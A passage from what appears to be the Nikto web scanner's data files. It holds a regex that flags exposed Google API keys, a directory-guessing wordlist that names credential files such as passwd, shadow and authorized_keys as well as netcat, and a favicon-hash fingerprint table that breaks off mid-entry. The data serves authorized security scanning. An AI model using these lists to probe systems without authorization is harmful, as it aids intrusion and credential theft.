Solutions.\"\n\"750530\",\"https://makeawebsitehub.com/parked-domains/\",\"Page Is Under Construction\",\"Domain is parked at Network Solutions.\"\n\"750531\",\"https://makeawebsitehub.com/parked-domains/\",\"Sponsored Listings\",\"Domain is parked at Voodoo.com.\"\n\"750532\",\"https://makeawebsitehub.com/parked-domains/\",\"FUTURE HOME OF A DOTSTER\",\"Domain is parked at Dotster.\"\n\"750533\",\"https://makeawebsitehub.com/parked-domains/\",\"Share this \\.tel\",\"Domain is parked at Knipp.\"\n\"750534\",\"https://trufflesecurity.com/blog/google-api-keys-werent-secrets-but-then-gemini-changed-the-rules\",\"([>\\\"=]AIz[\\w_\\.-]+)\",\"Google API keys may now be used for Gemini API access. The key is: $1 .\"\n"
  },
  {
    "path": "program/databases/db_dictionary",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\nADM\nADMIN\nAggreSpy\nAppsLocalLogin\nAppsLogin\nBUILD\nCMS\nCVS\nDB\nDMSDump\nDocuments\nEntries\nFCKeditor\nJMXSoapAdapter\nLICENSE\nMANIFEST.MF\nMETA-INF\nMakefile\nOA\nOAErrorDetailPage\nOA_HTML\nProgram\nREADME\nReadme\nRecycled\nRoot\nSQL\nSUNWmc\nSiteScope\nSiteServer\nSpy\nTEMP\nTMP\nTODO\nThumbs.db\nWEB-INF\nWS_FTP\nXXX\n_\n_adm\n_admin\n_common\n_conf\n_files\n_include\n_js\n_mem_bin\n_old\n_pages\n_private\n_res\n_source\n_src\n_test\n_vti_bin\n_vti_cnf\n_vti_pvt\n_vti_txt\n_www\na\naa\naaa\nabc\nabc123\nabcd\nabcd1234\nabout\naccess\naccess-log\naccess-log.1\naccess.1\naccess_log\naccess_log.1\naccessibility\naccount\naccounting\naccounts\naction\nactions\nactive\nactivex\nad\nadclick\nadd\naddpost\naddressbook\nadm\nadmin\nadmin_\nadodb\nads\nadv\nadvanced\nadvertise\nadvertising\naffiliate\naffiliates\nagenda\nagent\nagents\najax\nalbum\nalbums\nalert\nalerts\nalias\naliases\nall\nalpha\nalumni\namazon\nanalog\nandroid\nannouncement\nannouncements\nanon\nanonymous\nansi\napac\napache\napexec\napi\napis\napp\nappeal\nappeals\nappend\nappl\napple\nappliation\napplications\napps\napr\narch\narchive\narchives\narray\nart\narticle\narticles\nartwork\nascii\nasdf\nasset\nassets\natlassian\natom\nattach\nattachment\nattachments\nattaches\nattic\nauction\naudio\naudit\naudits\nauth\nauthor\nauthorized_keys\nauthors\nauto\nautomatic\nautomation\navatar\navatars\naward\nawards\nawl\nawstats\nb\nb2b\nb2c\nback\nbackdoor\nbackend\nbackup\nbackups\nbandwidth\nbank\nbanks\nbanner\nbanners\nbar\nbase\nbash\nbasic\nbasket\nbaskets\nbatch\nbaz\nbb\nbb-hist\nbb-histlog\nbboard\nbbs\nbeans\nbeehive\nbenefits\nbeta\nbfc\nbig\nbigip\nbill\nbilling\nbinaries\nbinary\nbins\nbio\nbios\nbiz\nbkup\nblah\nblank\nblog\nblogger\nbloggers\nblogs\nboard\nbofh\nbook\nbooks\nboot\nbottom\nbroken\nbroker\nbrowse\nbrowser\nbs\nbsd\nbugs\nbuild\nbuildr\nbulk\nbullet\nbusiness\nbutton\nbuttons\nbuy\nbuynow\nbypass\nca\ncache\ncal\ncalendar\ncamel\ncar\ncard\ncards\ncareer\ncareers\ncars\ncart\ncarts\ncat\ncatalog\ncatalogs\ncatalyst\ncategories\ncategory\ncatinfo\ncats\nccbill\ncd\ncerificate\ncert\ncertificate\ncertificates\ncerts\ncf\ncfcache\ncfdocs\ncfide\ncfusion\ncgi-bin\ncgi-bin2\ncgi-home\ncgi-local\ncgi-pub\ncgi-script\ncgi-shl\ncgi-sys\ncgi-web\ncgi-win\ncgibin\ncgiwrap\ncgm-web\nchange\nchanged\nchanges\ncharge\ncharges\nchat\nchats\ncheckout\nchild\nchildren\nchrome\ncisco\ncisweb\ncitrix\ncl\nclaim\nclaims\nclasses\nclassified\nclassifieds\nclear\nclick\nclicks\nclient\nclientaccesspolicy\nclients\nclose\nclosed\nclosing\nclub\ncluster\nclusters\ncmd\ncms\ncnf\ncnt\ncocoon\ncode\ncodec\ncodecs\ncodes\ncognos\ncoldfusion\ncolumns\ncom\ncomment\ncomments\ncommerce\ncommercial\ncommon\ncommunicator\ncommunity\ncompact\ncompany\ncomplaint\ncomplaints\ncompliance\ncomponent\ncomponents\ncompressed\ncomputer\ncomputers\ncomputing\nconference\nconferences\nconfigs\nconsole\nconsumer\ncontact\ncontacts\ncontent\ncontents\ncontest\ncontract\ncontracts\ncontrol\ncontroller\ncontrolpanel\ncookie\ncookies\ncopies\ncopy\ncopyright\ncore\ncorp\ncorpo\ncorporate\ncorrections\ncount\ncounter\ncounters\ncounts\ncourse\ncourses\ncover\ncpadmin\ncpanel\ncr\ncrack\ncrash\ncrashes\ncreate\ncredits\ncrm\ncron\ncrons\ncrontab\ncrontabs\ncrossdomain\ncrypt\ncrypto\ncss\ncurrent\ncustom\ncustom-log\ncustom_log\ncustomer\ncustomers\ncute\ncv\ncxf\nczcmdcvt\nd\ndaemon\ndaily\ndana-na\ndata\ndatabase\ndatabases\ndate\nday\ndb_connect\ndba\ndbase\ndbman\ndbmodules\ndbutil\ndc\ndcforum\nde\ndealer\ndebug\ndecl\ndeclaration\ndeclarations\ndecode\ndecrypt\ndecrypted\ndecryption\ndef\ndefault\ndefaults\ndefinition\ndefinitions\ndel\ndelete\ndeleted\ndemo\ndemos\ndenied\ndeny\ndesign\ndesktop\ndesktops\ndetail\ndetails\ndev\ndevel\ndeveloper\ndevelopers\ndevelopment\ndevice\ndevices\ndevs\ndf\ndialog\ndialogs\ndiff\ndiffs\ndigest\ndigg\ndir\ndirectories\ndirectory\ndirs\ndisabled\ndisclaimer\ndisplay\ndjango\ndl\ndm\ndm-config\ndms\ndms0\ndns\ndocebo\ndock\ndocroot\ndocs\ndocument\ndocumentation\ndocuments\ndomain\ndomains\ndonate\ndown\ndownload\ndownloader\ndownloads\ndrop\ndropped\ndrupal\ndummy\ndumps\ndvd\ndwr\ndynamic\ne\ne2fs\near\necommerce\nedge\nedit\neditor\nedits\nedp\nedu\neducation\nee\neffort\nefforts\negress\nejb\nelement\nelements\nem\nemail\nemails\nembed\nembedded\nemea\nemployees\nemployment\nempty\nemu\nemulator\nen\nen_US\nenc\nencode\nencrypt\nencrypted\nencryption\neng\nengine\nenglish\nenterprise\nentertainment\nentries\nentry\nenv\nenviron\nenvironment\nerror\nerror-log\nerror_log\nerrors\nes\nesale\nesales\netc\neurope\nevent\nevents\nevil\nevt\news\nex\nexample\nexamples\nexcalibur\nexchange\nexec\nexplorer\nexport\next\next2\nextern\nexternal\nextras\nezshopper\nf\nface\nfaces\nfaculty\nfail\nfailure\nfamily\nfaq\nfaqs\nfavorite\nfavorites\nfcgi-bin\nfeature\nfeatures\nfeed\nfeedback\nfeeds\nfelix\nfetch\nfield\nfields\nfile\nfileadmin\nfiles\nfilez\nfinance\nfinancial\nfind\nfinger\nfirefox\nfirewall\nfirst\nfixed\nflags\nflash\nflow\nflows\nflv\nfn\nfolder\nfolders\nfont\nfonts\nfoo\nfooter\nfooters\nform\nformatting\nformmail\nforms\nforrest\nfortune\nforum\nforum1\nforum2\nforumdisplay\nforums\nforward\nfoto\nfoundation\nfr\nframe\nframes\nframework\nfree\nfreebsd\nfriend\nfriends\nfrob\nfrontend\nfs\nftp\nfuck\nfuckoff\nfuckyou\nfull\nfun\nfunc\nfuncs\nfunction\nfunctions\nfusion\nfw\ng\ngadget\ngadgets\ngalleries\ngallery\ngame\ngames\nganglia\ngarbage\ngateway\ngb\ngeeklog\ngeneral\ngeronimo\nget\ngetaccess\ngetjobid\ngfx\ngid\ngitweb\nglimpse\nglobal\nglobals\nglossary\ngo\ngoaway\ngoogle\ngovernment\ngprs\ngrant\ngrants\ngraphics\ngroup\ngroupcp\ngroups\ngsm\nguest\nguestbook\nguests\nguide\nguides\ngump\ngwt\nh\nhack\nhacker\nhacking\nhackme\nhadoop\nhardcore\nhardware\nharmony\nhead\nheader\nheaders\nhealth\nhello\nhelp\nhelper\nhelpers\nhi\nhidden\nhide\nhigh\nhipaa\nhistory\nhit\nhits\nhole\nhome\nhomepage\nhop\nhorde\nhosting\nhosts\nhour\nhourly\nhowto\nhp\nhr\nhta\nhtbin\nhtdoc\nhtdocs\nhtpasswd\nhttp\nhttpd\nhttps\nhttpuser\nhu\nhyper\ni\nia\nibm\nicat\nicon\nicons\nid\nidea\nideas\nids\nie\niframe\nig\nignore\niisadmin\niisadmpwd\niissamples\nimage\nimagefolio\nimages\nimgs\nimp\nimport\nimportant\nin\ninbound\nincl\ninclude\nincludes\nincoming\nincubator\nindex\nindex1\nindex2\nindex_1\nindex_2\ninetpub\ninetsrv\ninf\ninfo\ninformation\ningress\ninit\ninline\ninput\ninquire\ninquiries\ninquiry\ninsert\ninstall\nint\ninterim\nintermediate\ninternal\ninternational\ninternet\nintl\nintranet\nintro\nip\nipc\niphone\nips\nirc\nis\nisapi\niso\nissues\nit\nitem\nj\nj2ee\nj2me\njakarta\njava-plugin\njavadoc\njavascript\njavax\njboss\njdbc\njigsaw\njira\njj\njmx-console\njob\njobs\njoe\njohn\njoin\njoomla\njournal\njp\njpa\njre\njrun\njson\njsso\njsx\njuniper\njunk\njvm\nk\nkboard\nkeep\nkernel\nkeygen\nkeys\nkids\nkill\nknown_hosts\nl\nlabs\nlang\nlarge\nlaw\nlayout\nlayouts\nldap\nleader\nleaders\nleft\nlegacy\nlegal\nlenya\nletters\nlevel\nlg\nlibrary\nlibs\nlicense\nlicenses\nlimit\nline\nlink\nlinks\nlinux\nlist\nlistinfo\nlists\nlive\nlo\nloader\nloading\nloc\nlocal\nlocation\nlock\nlocked\nlog4j\nlogfile\nlogger\nlogging\nlogin\nlogins\nlogo\nlogoff\nlogon\nlogos\nlogout\nlogs\nlost\nlost+found\nlow\nls\nlucene\nm\nmac\nmail\nmailer\nmailing\nmailman\nmails\nmain\nmambo\nmanage\nmanagement\nmanager\nmanual\nmanuals\nmap\nmaps\nmark\nmarketing\nmaster\nmaster.passwd\nmatch\nmatrix\nmaven\nmbox\nme\nmedia\nmedium\nmem\nmember\nmembers\nmembership\nmemory\nmenu\nmessage\nmessages\nmessaging\nmicrosoft\nmigrate\nmigration\nmina\nmini\nminute\nmirror\nmirrors\nmisc\nmission\nmix\nmlist\nmms\nmobi\nmobile\nmock\nmod\nmodify\nmods\nmodule\nmodules\nmojo\nmoney\nmonitoring\nmonth\nmonthly\nmore\nmotd\nmove\nmovie\nmovies\nmp\nmp3\nmp3s\nms\nms-sql\nmsadc\nmsadm\nmsie\nmsql\nmssql\nmta\nmultimedia\nmusic\nmx\nmy\nmyadmin\nmyfaces\nmyphpnuke\nmysql\nmysqld\nn\nnav\nnavigation\nnc\nnet\nnetbsd\nnetcat\nnethome\nnets\nnetwork\nnetworking\nnew\nnews\nnewsletter\nnewsletters\nnewticket\nnext\nnfs\nnice\nnl\nnobody\nnode\nnone\nnote\nnotes\nnotification\nnotifications\nnotified\nnotifier\nnotify\nns\nnuke\nnul\nnull\noa_servlets\noauth\nobdc\nobsolete\nobsoleted\nodbc\node\noem\nofbiz\noffice\nonbound\nonline\nop\nopen\nopenbsd\nopendir\nopenejb\nopenjpa\nopera\noperations\nopinion\noprocmgr-status\nopt\noption\noptions\noracle\noracle.xml.xsql.XSQLServlet\norder\nordered\norders\norg\nosc\noscommerce\nother\noutgoing\noutline\noutput\noutreach\noverview\nowa\nows\nows-bin\np\np2p\npack\npackages\npage\npage1\npage2\npage_1\npage_2\npages\npaid\npanel\npaper\npapers\nparse\npartner\npartners\nparty\npass\npasswd\npassword\npasswords\npast\npatch\npatches\npayment\npayments\npaypal\npbo\npc\npci\npda\npdfs\npear\npeek\npending\npeople\nperf\nperformance\nperl\npersonal\npg\nphf\nphone\nphones\nphorum\nphoto\nphotos\nphpBB\nphpBB2\nphpEventCalendar\nphpMyAdmin\nphpbb\nphpmyadmin\nphpnuke\nphps\npic\npics\npictures\npii\nping\npipe\npipermail\npiranha\npivot\npix\npixel\npkg\npkgs\nplain\nplay\nplayer\nplaying\nplaylist\npls\nplugin\nplugins\npm\npoc\npoi\npolicies\npolicy\npolitics\npoll\npolls\npool\npop\npop3\npopup\nporn\nport\nportal\nportals\nportfolio\npos\npost\nposted\npostgres\npostgresql\npostnuke\npostpaid\nposts\npr\npr0n\npremium\nprepaid\npresentation\npresentations\npreserve\npress\npreview\npreviews\nprevious\npricing\nprint\nprintenv\nprinter\nprinters\npriv\nprivacy\nprivate\npro\nproblems\nproc\nprocedures\nprod\nproduct\nproduct_info\nproduction\nproducts\nprofile\nprofiles\nprofiling\nprogram\nprogramming\nprograms\nproject\nprojects\npromo\nprop\nproperties\nproperty\nprops\nprot\nprotect\nprotected\nprotection\nproto\nproxies\nproxy\nprv\nps\npsql\npt\npub\npublic\npublication\npublications\npubs\npull\npurchase\npurchases\npurchasing\npush\npw\npwd\npython\nq\nqotd\nqpid\nqueries\nquery\nqueue\nqueues\nquote\nquotes\nr\nradio\nrandom\nrdf\nread\nreadme\nrealestate\nreceive\nreceived\nrecharge\nrecord\nrecorded\nrecorder\nrecords\nrecovery\nrecycle\nrecycled\nredir\nredirect\nreference\nreg\nregister\nregistered\nregistration\nregistrations\nrelease\nreleases\nremind\nreminder\nremote\nremove\nremoved\nrender\nrendered\nrep\nrepl\nreplica\nreplicas\nreplicate\nreplicated\nreplication\nreplicator\nreply\nreport\nreporting\nreports\nreprints\nreq\nreqs\nrequest\nrequests\nrequisition\nrequisitions\nres\nresearch\nresin\nresize\nresource\nresources\nrest\nrestore\nrestored\nrestricted\nresults\nretail\nreverse\nreversed\nrevert\nreverted\nreview\nreviews\nright\nroam\nroaming\nrobot\nrobots\nroller\nroom\nroot\nrpc\nru\nrule\nrules\nrun\nrwservlet\ns\nsale\nsales\nsam\nsamba\nsaml\nsample\nsamples\nsav\nsaved\nsaves\nsbin\nscan\nscanned\nscans\nsched\nschedule\nscheduled\nscheduling\nschema\nscience\nscreen\nscreens\nscreenshot\nscreenshots\nscript\nscriptlet\nscriptlets\nscripts\nsdk\nse\nsearch\nsec\nsecond\nsecret\nsection\nsections\nsecure\nsecured\nsecurity\nseed\nselect\nsell\nsend\nsendmail\nsendto\nsent\nserial\nserv\nserve\nserver\nserver-info\nserver-status\nservers\nservice\nservices\nservlet\nservlets\nsession\nsessions\nsetting\nsettings\nsetup\nshadow\nshare\nshared\nshares\nshell\nship\nshipped\nshipping\nshop\nshopper\nshopping\nshops\nshoutbox\nshow\nshow_post\nshow_thread\nshowcat\nshowenv\nshowjobs\nshowmap\nshowmsg\nshowpost\nshowthread\nsign\nsigned\nsigner\nsignin\nsigning\nsignoff\nsignon\nsignout\nsignup\nsimple\nsink\nsite\nsite-map\nsite_map\nsitemap\nsites\nskel\nskin\nskins\nskip\nsl\nsling\nsm\nsmall\nsmile\nsmiles\nsms\nsmtp\nsnoop\nsoap\nsoaprouter\nsoft\nsoftware\nsolaris\nsold\nsolution\nsolutions\nsource\nsources\nsoutbox\nsox\nsp\nspace\nspacer\nspam\nspecial\nspecials\nsponsor\nsponsors\nspool\nsport\nsports\nsqlnet\nsquirrel\nsquirrelmail\nsrc\nsrv\nss\nssh\nssi\nssl\nsslvpn\nssn\nsso\nstaff\nstaging\nstandalone\nstandard\nstandards\nstar\nstart\nstat\nstatement\nstatements\nstatic\nstaticpages\nstatistic\nstatistics\nstats\nstatus\nstock\nstorage\nstore\nstored\nstories\nstory\nstrut\nstruts\nstudent\nstudents\nstuff\nstyle\nstyles\nsubmissions\nsubmit\nsubscribe\nsubscribed\nsubscriber\nsubscribers\nsubscription\nsubscriptions\nsuccess\nsuite\nsuites\nsun\nsunos\nsuper\nsupport\nsurf\nsurvey\nsurveys\nsws\nsynapse\nsync\nsynced\nsys\nsysmanager\nsystem\nsystems\nsysuser\nt\ntag\ntags\ntape\ntapes\ntapestry\ntb\ntcl\nteam\ntech\ntechnical\ntechnology\ntel\ntele\ntempl\ntemplate\ntemplates\nterms\ntest-cgi\ntest-env\ntest1\ntest123\ntest1234\ntest2\ntest3\ntestimonial\ntestimonials\ntesting\ntests\ntexis\ntext\ntexts\ntheme\nthemes\nthread\nthreads\nthumb\nthumbnail\nthumbnails\nthumbs\ntickets\ntiki\ntiles\ntip\ntips\ntitle\ntls\ntmpl\ntmps\ntn\ntoc\ntodo\ntoggle\ntomcat\ntool\ntoolbar\ntoolkit\ntools\ntop\ntopic\ntopics\ntorrent\ntorrents\ntos\ntour\ntpl\ntpv\ntr\ntraceroute\ntrace\ntraces\ntrack\ntrackback\ntracker\ntrackers\ntracking\ntracks\ntraffic\ntrailer\ntrailers\ntraining\ntrans\ntransparent\ntransport\ntrash\ntravel\ntreasury\ntree\ntrees\ntrial\ntrunk\ntsweb\ntt\nturbine\ntuscany\ntutorial\ntutorials\ntv\ntweak\ntype\ntypo3\ntypo3conf\nu\nubb\nuds\nuk\numts\nunion\nunix\nunlock\nunreg\nunregister\nunsubscribe\nup\nupd\nupdate\nupdated\nupdater\nupdates\nupfile\nupfiles\nupload\nuploader\nuploads\nurl\nurls\nus\nusa\nusage\nuser\nuserlog\nusers\nusr\nutil\nutilities\nutility\nutils\nv\nv1\nv2\nvar\nvault\nvector\nvelocity\nvendor\nver\nver1\nver2\nversion\nvfs\nvideo\nvideos\nview\nview-source\nviewcvs\nviewforum\nviewonline\nviews\nviewsource\nviewsvn\nviewtopic\nviewvc\nvirtual\nvm\nvoip\nvol\nvote\nvoter\nvotes\nvpn\nvuln\nw\nw3\nw3c\nwa\nwap\nwar\nwarez\nway-board\nwbboard\nwc\nweather\nweb\nweb-beans\nweb-console\nwebaccess\nwebadmin\nwebagent\nwebalizer\nwebapp\nwebb\nwebbbs\nwebboard\nwebcalendar\nwebcart\nwebcasts\nwebcgi\nwebchat\nwebdata\nwebdav\nwebdb\nweblog\nweblogic\nweblogs\nwebmail\nwebplus\nwebshop\nwebsite\nwebsphere\nwebsql\nwebstats\nwebsvn\nwebwork\nweek\nweekly\nwelcome\nwhitepapers\nwhois\nwhosonline\nwicket\nwiki\nwin\nwin32\nwindows\nwinnt\nwireless\nwml\nword\nwordpress\nwork\nworking\nworld\nwp\nwp-content\nwp-dbmanager\nwp-includes\nwp-login\nwp-syntax\nwrap\nws\nws-client\nws_ftp\nwtai\nwww\nwww-sql\nwww1\nwww2\nwww3\nwwwboard\nwwwroot\nwwwstats\nwwwthreads\nwwwuser\nwysiwyg\nx\nxalan\nxerces\nxhtml\nxmlrpc\nxslt\nxsql\nxxx\nxyzzy\ny\nyahoo\nyear\nyearly\nyoutube\nyt\nz\nzboard\nzencart\nzend\nzero\nzipfiles\nzips\nzoom\nzope\nzorum\n"
  },
  {
    "path": "program/databases/db_favicon",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Example to get the md5hash: $ md5sum favicon.ico\n#######################################################################\n\"nikto_id\",\"md5hash\",\"description\"\n\"500017\",\"4987120f4fb1dc454f889e8c92f6dabe\",\"Google Web Server\"\n\"500108\",\"c0dc2e457e05c2ce0a99886ec1048d77\",\"Platform Computing Corporation Platform Management Console Version v2.0\"\n\"500109\",\"92d0841188d40b6fef294cf53a8addd7\",\"cPanel cpsrvd webmail server\"\n\"500110\",\"9afa5d60e5ef15dc75d7662e418cac72\",\"QNAP TurboNAS\"\n\"500111\",\"5f09cded07bb864fd9b3d2dd72b5418e\",\"TwonkyServer Premium 7.0.x\"\n\"500112\",\"773669c6c97d65ac5ede9e8ea6b47116\",\"Plex Media Server 0.9.x\"\n\"500113\",\"46b742e6ba5d7ac03f13b312601c113f\",\"XBMC Media Center 12.x (Web Interface)\"\n\"500114\",\"88733ee53676a47fc354a61c32516e82\",\"Magento Go CMS\"\n\"500115\",\"6d2adf39ca320265830403dfc030033a\",\"Liferay Portal\"\n\"500117\",\"297d726681297cbf839f43a125e5c9b4\",\"ZNC IRC Bouncer (Web Interface)\"\n\"500118\",\"d577e9569381685b30feae22484c8344\",\"ZNC IRC Bouncer (Web Interface)\"\n\"500151\",\"28c34462a074c5311492759435549468\",\"AContent\"\n\"500153\",\"705d63d8f6f485bd40528394722b5c22\",\"Atmail\"\n\"500154\",\"9f500a24ccbdda88cf8ae3ec7b61fc40\",\"Atomic CMS\"\n\"500155\",\"5b816961f19da96ed5a2bf15e79093cb\",\"ATutor\"\n\"500157\",\"f51425ace97f807fe5840c4382580fd5\",\"Beehive Forum 1.x\"\n\"500158\",\"eb05f77bf80d66f0db6b1f682ff08bee\",\"Biscom Delivery Server\"\n\"500159\",\"5d27143fc38439baba39ba5615cbe9ef\",\"Cascade Server\"\n\"500160\",\"0c53ef3d151cbac70a8486dd1ebc8b25\",\"Chamilo e-learning system\"\n\"500161\",\"9939a032a9845e4d931d14e08f5a6c7c\",\"Citrix XenApp Logon\"\n\"500162\",\"6c633b9b92530843c782664cb3f0542d\",\"ClipBucket\"\n\"500163\",\"a59c6fead5d55050674f327955df3acb\",\"CouchPotato 2.x\"\n\"500164\",\"107579220745d3b21461c23024d6c4a3\",\"D-Link\"\n\"500165\",\"c86974467c2ac7b6902189944f812b9a\",\"Domain Technology Control 0.17.x-0.24.x\"\n\"500167\",\"d9aa63661d742d5f7c7300d02ac18d69\",\"Dreambox WebControl\"\n\"500168\",\"a4819787db1dabe1a6b669d5d6df3bfd\",\"Drupal 2.x-4.x\"\n\"500170\",\"b6341dfc213100c61db4fb8775878cec\",\"Drupal 7.x\"\n\"500171\",\"0a99a23f6b1f1bddb94d2a2212598628\",\"Maraschino\"\n\"500172\",\"51b916bdaf994ce73d3e5e6dfe2a46ee\",\"Feng Office 2.3\"\n\"500173\",\"d134378a39c722e941ac25eed91ca93b\",\"FreePBX\"\n\"500174\",\"45210ace96ce9c893f8c27c5decab10d\",\"Fritz!\"\n\"500178\",\"835306119474fefb6b38ae314a37943a\",\"Horde Agora (Forum)\"\n\"500179\",\"b64a1155b80e0b06272f8b842b83fa57\",\"Horde Ansel (Photo Manager)\"\n\"500180\",\"0e6a6ed665a9669b368d9a90b87976a9\",\"Horde Gollem (File Manager)\"\n\"500182\",\"6c18a6e983f64b6a6ed0a32c9e8a19b6\",\"HP ProCurve Webserver\"\n\"500183\",\"6acfee4c670580ebf06edae40631b946\",\"Iomega StorCenter\"\n\"500184\",\"1f9c39ef3f740eebb046c900edac4ba5\",\"Iomega StorCenter ix2-200\"\n\"500185\",\"37a99d2ddea8b49f701db457b9a8ffed\",\"Iomega StorCenter ix4-200d\"\n\"500186\",\"e7dce6ac6d8713a0b98407254ca33f80\",\"Iomega StorCenter ix4-300d\"\n\"500187\",\"f08d232927ab8f2c661616b896928233\",\"Iomega StorCenter px2-300d\"\n\"500188\",\"9d203fbb74eabf67f48b965ba5acc9a6\",\"Iomega StorCenter px4-300d\"\n\"500189\",\"fbd140da4eff02b90c9ebcbdb3736322\",\"Iomega StorCenter px4-300r\"\n\"500190\",\"fd3f689b804ddb7bfab53fdf32bf7c04\",\"Iomega StorCenter px6-300d\"\n\"500191\",\"8dfab2d881ce47dc41459c6c0c652bcf\",\"Iomega StorCenter px12-350r\"\n\"500192\",\"66dcdd811a7d8b1c7cd4e15cef9d4406\",\"Iomega StorCenter px12-400r\"\n\"500193\",\"a7fe149a9f2582f38576d14d9b1f0f55\",\"LaCie Dashboard\"\n\"500197\",\"2ba9b777483da0a6a8b29c4ab39a10b2\",\"MagicMail\"\n\"500199\",\"701bb703b31f99da18251ca2e557edf0\",\"Mantis Bug Tracker 1.2.9-1.2.15\"\n\"500202\",\"d4af3be33d952c1f98684d985019757c\",\"Moodle 2.0 : Magazine\"\n\"500203\",\"b88c0eedc72d3bf4e86c2aa0a6ba6f7b\",\"NAS4Free 9.0\"\n\"500205\",\"11abb4301d06dccc36d1b5f6dcad093e\",\"ntop 3.3.6-5.0.1\"\n\"500206\",\"b9d28bd6822d2e09e01aa0af5d7ccc34\",\"ocPortal 9.0.5\"\n\"500207\",\"eec3051d5c356d1798bea1d8a3617c51\",\"Octopress\"\n\"500208\",\"9c34a7481ba0c153bb3e2a10e0ea811e\",\"OpenWebif\"\n\"500209\",\"49bf194d1eccb1e5110957d14559d33d\",\"OTRS\"\n\"500211\",\"d361075db94bb892ff3fb3717714b2da\",\"phpMyBackupPro\"\n\"500212\",\"a456dd2bae5746beb68814a5ac977048\",\"phpSysInfo 3.0.7\"\n\"500213\",\"6e0c5b7979e9950125c71341e0960f65\",\"phpSysInfo 3.0.8-3.0.12\"\n\"500214\",\"ddcc65196f0bc63a90c885bd88ecbb81\",\"phpSysInfo 3.0.12-3.0.20, 3.1.0-3.1.4\"\n\"500216\",\"ba4bfe5d1deb2b4410e9eb97c5b74c9b\",\"Puppet Node Manager\"\n\"500217\",\"368c15ac73f0096aa3daff8ff6f719f8\",\"Redaxscript 1.0-1.2.1\"\n\"500218\",\"6d85758acb4f4baa4d242ba451c91026\",\"Redmine x, Request Tracker\"\n\"500220\",\"228ba3f6d946af4298b080e5c934487c\",\"Roundcube Webmail 0.6-0.7 : Default, 0.8-0.9 : Classic, 0.8-0.9 : Larry\"\n\"500223\",\"ed8cf53ef6836184587ee3a987be074a\",\"Ruckus\"\n\"500224\",\"f6c5f5e8857ecf561029fc5da005b6e3\",\"Sophos Email Appliance\"\n\"500229\",\"f682dbd4d0a18dd7699339b8adb28c0f\",\"QNAP TurboNAS 3.8.x : Admin\"\n\"500230\",\"7ff45523a7ee9686d3d391a0a27a0b4f\",\"QNAP TurboNAS 4.0.x\"\n\"500231\",\"a967c8bfde9ea0869637294b679b7251\",\"Squid Proxy Server\"\n\"500232\",\"bc18566dcc41a0ff503968f461c4995a\",\"Subrion CMS\"\n\"500233\",\"531e652a15bc0ad59b6af05019b1834a\",\"Synology DSM 4.2\"\n\"500234\",\"0ec12e5820517d3b62e56b9a8f1ee5bc\",\"TradingEye\"\n\"500236\",\"300b5c3f134d7ec0bca862cf113149d8\",\"TVersity\"\n\"500238\",\"8718c2998236c796896b725f264092ee\",\"Typo3 6.1\"\n\"500239\",\"7350c3f75cb80e857efa88c2fd136da5\",\"Ushahidi\"\n\"500240\",\"2e5e985fe125e3f8fca988a86689b127\",\"VISEC\"\n\"500241\",\"d90cc1762bf724db71d6df86effab63c\",\"vtiger CRM\"\n\"500242\",\"b14353fafda7c90fb1a2a214c195de50\",\"webERP\"\n\"500243\",\"18fe76b96d4eae173bf439a9712fa5c1\",\"WikiWebHelp\"\n\"500244\",\"e44d22b74f7ee4435e22062d5adf4a6a\",\"WordPress 2.x\"\n\"500245\",\"3ead5afa19537170bb980924397b70d6\",\"WordPress 3.x : Twenty Ten\"\n\"500246\",\"28a122aa74f6929b0994fc544555c0b1\",\"WordPress 3.2-3.x : Twenty Eleven\"\n\"500248\",\"e9dd9992d222d67c8f6a4704d2c88bdd\",\"Zarafa WebAccess\"\n\"500249\",\"c126f7e761813946fea2e90ff7ddb838\",\"Zenoss Core\"\n\"500501\",\"6399cc480d494bf1fcd7d16c42b1c11b\",\"penguin\"\n\"500502\",\"09b565a51e14b721a323f0ba44b2982a\",\"Google web server\"\n\"500503\",\"506190fc55ceaa132f1bc305ed8472ca\",\"SocialText\"\n\"500504\",\"2cc15cfae55e2bb2d85b57e5b5bc3371\",\"PHPwiki (1.3.14) / gforge (4.6.99+svn6496) - wiki\"\n\"500505\",\"389a8816c5b87685de7d8d5fec96c85b\",\"XOOPS cms\"\n\"500506\",\"f1876a80546b3986dbb79bad727b0374\",\"NetScreen WebUI or 3Com Router\"\n\"500507\",\"226ffc5e483b85ec261654fe255e60be\",\"Netscape 4.1\"\n\"500508\",\"b25dbe60830705d98ba3aaf0568c456a\",\"Netscape iPlanet 6.0\"\n\"500509\",\"41e2c893098b3ed9fc14b821a2e14e73\",\"Netscape 6.0 (AOL)\"\n\"500510\",\"a28ebcac852795fe30d8e99a23d377c1\",\"SunOne 6.1\"\n\"500511\",\"71e30c507ca3fa005e2d1322a5aa8fb2\",\"Apache on Redhat\"\n\"500512\",\"d41d8cd98f00b204e9800998ecf8427e\",\"Zero byte favicon\"\n\"500513\",\"dcea02a5797ce9e36f19b7590752563e\",\"Parallels Plesk \"\n\"500514\",\"6f767458b952d4755a795af0e4e0aa17\",\"Yahoo!\"\n\"500515\",\"5b0e3b33aa166c88cee57f83de1d4e55\",\"DotNetNuke (http://www.dotnetnuke.com)\"\n\"500516\",\"7dbe9acc2ab6e64d59fa67637b1239df\",\"Lotus-Domino\"\n\"500517\",\"fa54dbf2f61bd2e0188e47f5f578f736\",\"WordPress\"\n\"500518\",\"6cec5a9c106d45e458fc680f70df91b0\",\"WordPress - obsolete version\"\n\"500519\",\"81ed5fa6453cf406d1d82233ba355b9a\",\"E-zekiel\"\n\"500520\",\"ecaa88f7fa0bf610a5a26cf545dcd3aa\",\"3-byte invalid favicon\"\n\"500521\",\"c1201c47c81081c7f0930503cae7f71a\",\"vBulletin forum\"\n\"500522\",\"edaaef7bbd3072a3a0c3fb3b29900bcb\",\"Powered by Reynolds Web Solutions (Car sales 